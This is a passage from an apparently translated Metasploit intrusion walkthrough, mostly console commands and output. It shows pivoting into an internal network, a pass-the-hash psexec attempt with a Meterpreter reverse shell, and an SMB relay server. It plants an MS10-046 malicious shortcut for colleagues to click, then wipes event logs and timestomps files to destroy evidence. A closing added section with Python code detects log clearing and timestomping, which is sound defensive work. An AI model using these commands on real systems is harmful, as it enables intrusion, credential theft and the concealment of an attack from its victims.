- msf auxiliary(jtr_crack_fast) >
So msf has successfully added a route for the 192.168.0.0/24 segment via session 1; all of the attacker's traffic to that segment is forwarded through session 1.
2) Port 445 scan: file sharing / printer sharing service
- msf auxiliary(jtr_crack_fast) > set RHOSTS 192.168.0.0/24
- RHOST => 192.168.0.0/24
- msf auxiliary(jtr_crack_fast) > set PORTS 445
- PORTS => 445
- msf auxiliary(jtr_crack_fast) > use auxiliary/scanner/portscan/tcp
- msf auxiliary(tcp) > run
Inexplicably nothing is found; after run it just sits there..
3) psexec against port 445: SMB hash passing
- msf exploit(psexec) > use exploit/windows/smb/psexec
- msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(psexec) > set LHOST 192.168.0.108
- LHOST => 192.168.0.108
- msf exploit(psexec) > set LPORT 443
- LPORT => 443
- msf exploit(psexec) > set RHOST 192.168.0.111
- RHOST => 192.168.0.111
- msf exploit(psexec) > set SMBPass daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
- SMBPass => daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
- msf exploit(psexec) > exploit
- [*] Started reverse handler on 192.168.0.108:443
- [*] Connecting to the server...
- [*] Authenticating to 192.168.0.111:445|WORKGROUP as user ''...
- [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
- msf exploit(psexec) >
Er, this is a failed example, but if someone has logged on to this machine and used its SMB service, and the SMBPass we set (a hash found elsewhere) matches, then it works..
It relies on luck, but passing the hash (rather than cracking it) is still a good method..
4) MS10-046 + MS08-068 + build your own SMB server and wait for the fish to bite
Set up the SMB server:
- msf post(droplnk) > use exploit/windows/smb/smb_relay
- msf exploit(smb_relay) > show options
- Module options (exploit/windows/smb/smb_relay):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- SMBHOST no The target SMB server (leave empty for originating system)
- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
- SRVPORT 445 yes The local port to listen on.
- SSL false no Negotiate SSL for incoming connections
- SSLCert no Path to a custom SSL certificate (default is randomly generated)
- SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(smb_relay) > set SRVHOST 192.168.0.108
- SRVHOST => 192.168.0.108
- msf exploit(smb_relay) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(smb_relay) > set LHOST 192.168.0.108
- LHOST => 192.168.0.108
- msf exploit(smb_relay) > exploit
- [*] Exploit running as background job.
- [*] Started reverse handler on 192.168.0.108:4444
- [*] Server started.
- msf exploit(smb_relay) >
MS10-046, the LNK shortcut file vulnerability, apparently can escalate privileges:
- It lives in shell32.dll, which Windows uses to load a shortcut's icon. When the icon resides in a user-supplied DLL, a malicious LNK file can be crafted to point at that DLL..
- The parser does not validate the parameters properly, so the user's DLL gets loaded and executed..
- msf exploit(psexec) > use post/windows/escalate/droplnk
- msf post(droplnk) > show options
- Module options (post/windows/escalate/droplnk):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- ICONFILENAME icon.png yes File name on LHOST's share
- LHOST yes Host listening for incoming SMB/WebDAV traffic
- LNKFILENAME Words.lnk yes Shortcut's filename
- SESSION yes The session to run this module on.
- SHARENAME share1 yes Share name on LHOST
- msf post(droplnk) > set LHOST 192.168.0.108
- LHOST => 192.168.0.108
- msf post(droplnk) > set session 1
- session => 1
- msf post(droplnk) > exploit
- [*] Creating evil LNK
- [*] Done. Writing to disk - C:\WINDOWS\system32\Words.lnk
- [*] Done. Wait for evil to happen..
- [*] Post module execution completed
- msf post(droplnk) >
The process:
- We copy this C:\Windows\system32\Words.lnk file into a shared folder on the internal network.. and wait for someone to click it..
- If some colleague A clicks the lnk file, MS10-046 is triggered.. A then connects to the malicious SMB server we set up, which in turn triggers MS08-068..
- The two vulnerabilities together mean one look and you're owned..
Extended reading:
- NT LAN Manager: early SMB transmitted passwords in cleartext over the network. Then came the LAN Manager Challenge/Response authentication mechanism, LM for short, which is so simple that it is easily cracked. Microsoft then proposed the Windows NT challenge/response mechanism, called NTLM.
- MS08-068 is a flaw in SMB's handling of NTLM. When the target connects to the attacker's malicious SMB server, the attacker delays the SMB response, extracts the target's NTLM hash and replays it back at the target, thereby authenticating..
9. Destroying evidence
1) clearev
- meterpreter > clearev
- [*] Wiping 148 records from Application...
- [*] Wiping 335 records from System...
- [*] Wiping 0 records from Security...
- meterpreter >
2) timestomp
- meterpreter > ls
- Listing: c:\
- ============
- Mode Size Type Last modified Name
- ---- ---- ---- ------------- ----
- 100666/rw-rw-rw- 0 fil 2013-12-07 16:44:55 +0800 1.txt.txt
- 100666/rw-rw-rw- 68 fil 2013-12-07 12:28:07 +0800 nimeia.txt
- meterpreter > timestomp 1.txt.txt -f nimeia.txt
- [*] Setting MACE attributes on 1.txt.txt from nimeia.txt
- meterpreter > ls
- Listing: c:\
- ============
- Mode Size Type Last modified Name
- ---- ---- ---- ------------- ----
- 100666/rw-rw-rw- 0 fil 2013-12-07 12:28:07 +0800 1.txt.txt
- 100666/rw-rw-rw- 68 fil 2013-12-07 12:28:07 +0800 nimeia.txt
- meterpreter >
This way the file's timestamps are changed, making it harder for anyone to notice..
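Neither technique is invisible. Clearing an event log is itself logged (the Security log records Event ID 517 on XP/2003 and 1102 on Vista and later; the System log records 104 on Vista and later), and timestomp changes only the $STANDARD_INFORMATION timestamps that `ls` shows, while the $FILE_NAME attribute in the MFT keeps the original values. The following is an added example, not code from the post or from Metasploit: it checks constructed $SI/$FN timestamp pairs modelled on the 1.txt.txt listing above and picks out log-clear events from constructed event records.

```python
"""Indicators left behind by clearev and timestomp (added example, not from the post).

Two checks a responder can run over forensic data:
  * cleared event logs: the clearing itself is logged (Security 517 on XP/2003,
    1102 on Vista+, System 104 on Vista+), so a "wipe" leaves a marker;
  * timestomping: Meterpreter's timestomp rewrites the $STANDARD_INFORMATION
    timestamps but not $FILE_NAME, so the two attributes disagree afterwards.
All records below are constructed to mirror the post's listing of 1.txt.txt.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

CST = timezone(timedelta(hours=8))  # the post's +0800 timestamps


@dataclass
class MftTimes:
    name: str
    si_created: datetime    # $STANDARD_INFORMATION (what timestomp changes)
    si_modified: datetime
    fn_created: datetime    # $FILE_NAME (left untouched by timestomp)
    fn_modified: datetime


def timestomp_indicators(rec: MftTimes) -> list:
    """Return the reasons this record looks timestomped (empty list if clean)."""
    reasons = []
    if rec.si_created < rec.fn_created:
        reasons.append("$SI creation time precedes $FN creation time")
    if rec.si_modified < rec.fn_modified:
        reasons.append("$SI modification time precedes $FN modification time")
    # Heuristic: tools that set times by hand often leave whole-second values
    # while the untouched $FN keeps its sub-second precision.
    if (rec.si_created.microsecond == 0 and rec.si_modified.microsecond == 0
            and rec.fn_created.microsecond != 0):
        reasons.append("$SI timestamps have zero sub-second part, $FN does not")
    return reasons


LOG_CLEAR_IDS = {("Security", 517), ("Security", 1102), ("System", 104)}


def log_clear_events(events) -> list:
    """Pick out the records that mean 'this log was cleared'."""
    return [e for e in events if (e["log"], e["event_id"]) in LOG_CLEAR_IDS]


# Constructed MFT view of the post's listing after `timestomp 1.txt.txt -f nimeia.txt`:
# the copied $SI times say 12:28:07, the $FN times still say the file was made at 16:44:55.
RECORDS = [
    MftTimes("1.txt.txt",
             si_created=datetime(2013, 12, 7, 12, 28, 7, 123456, CST),
             si_modified=datetime(2013, 12, 7, 12, 28, 7, 123456, CST),
             fn_created=datetime(2013, 12, 7, 16, 44, 55, 987654, CST),
             fn_modified=datetime(2013, 12, 7, 16, 44, 55, 987654, CST)),
    MftTimes("nimeia.txt",
             si_created=datetime(2013, 12, 7, 12, 28, 7, 123456, CST),
             si_modified=datetime(2013, 12, 7, 12, 28, 7, 123456, CST),
             fn_created=datetime(2013, 12, 7, 12, 28, 7, 123456, CST),
             fn_modified=datetime(2013, 12, 7, 12, 28, 7, 123456, CST)),
]

# Constructed event records: an XP box right after clearev (517 in Security).
EVENTS = [
    {"log": "Security", "event_id": 517, "time": "2013-12-07 16:50:01"},
    {"log": "Security", "event_id": 528, "time": "2013-12-07 16:50:30"},
    {"log": "System", "event_id": 7036, "time": "2013-12-07 16:51:00"},
]

if __name__ == "__main__":
    for rec in RECORDS:
        print(rec.name, timestomp_indicators(rec) or "no indicators")
    print("log-clear events:", log_clear_events(EVENTS))
```

The $FN comparison is the strong signal: a file cannot have been created (per $SI) before the name entry that refers to it was created (per $FN). The sub-second heuristic is weaker and is labelled as such in the code.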